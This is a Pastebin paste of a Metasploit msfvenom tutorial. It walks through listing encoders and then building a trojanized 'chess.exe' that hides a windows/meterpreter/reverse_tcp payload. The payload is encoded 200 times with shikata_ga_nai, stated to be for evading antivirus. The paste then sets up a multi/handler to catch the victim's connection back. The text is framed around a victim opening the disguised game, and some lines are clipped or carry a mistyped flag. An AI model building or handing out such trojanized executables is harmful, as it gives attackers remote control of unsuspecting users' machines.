API tools faq
paste
Advertisement
SH1NU11b1

msvenom

SH1NU11b1
Feb 11th, 2015
318
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.30 KB | None | 0 0
raw download clone embed print report
  1. msf > msfvenom
  2.  
  3.  
  4. ncoders are the various algorithms and encoding schemes that Metasploit can use to re-encode the payloads. Metasploit has numerous encoding schemes, and we can look at these by typing:
  5.  
  6. msf > msfvenom -l encoders
  7.  
  8.  
  9. Step 4: View the Payload Options
  10.  
  11. We can use msfvenom to check the options that we need to set for any payload similar to "show options" in the Metasploit console. The command to check any payload's options is:
  12.  
  13. msf > msfvenom -p <payload name> -o
  14.  
  15. So, if we want to check the options for the windows/meterpreter/reverse_tcp payload, we simply type:
  16.  
  17. msf >msfvenom -p windows/meterpreter/reverse_tcp -0
  18.  
  19.  
  20.  
  21. tep 5: Create a Custom Windows Executable
  22.  
  23. Now, let's create a custom Windows executable with a custom template. Although we can create a payload without a custom template, we have a better chance of getting past security devices and AV if we use a custom template. In this case, we will use a chess game named "chess.exe." The idea here is that we will embed the meterpreter payload into the chess game and then, when the victim opens the game to play chess, it will open a meterpreter session on our system.
  24.  
  25. I have placed the chess game in the /usr/share directory.
  26.  
  27. To create a malicious executable with the windows/meterpreter/reverse_tcp embedded inside, we simply type:
  28.  
  29. msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST= <your local IP> LPORT=<whatever port you want to listen on> -x /usr/share/chess.exe -e x86/shikata_ga_nai -i 200 -f exe >chess.exe
  30.  
  31.  
  32.  
  33. -p /windows/meterpreter/reverse_tcp designates the payload we want to embed
  34. LHOST designates the local host
  35. LPORT designates the port we want to listen on
  36. -x designates the template we want to use and the path to it
  37. -e x86/shikata_ga_nai designates the encoder we want to use
  38. -i 200 represents the number of iterations
  39. -f exe designates we want to create an executable (.exe)
  40. chess.exe designates the name of the file created
  41.  
  42.  
  43.  
  44. When the victim clicks on the chess.exe file, the meterpreter payload will be activated and will look to make a connection back to your system (LHOST). For the connection to succeed, you will need to open the multi-handler in Metasploit to receive the connection.
  45.  
  46. msf >use exploit/multi/handler
  47. msf > set payload windows/meterpreter/reverse_tcp
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!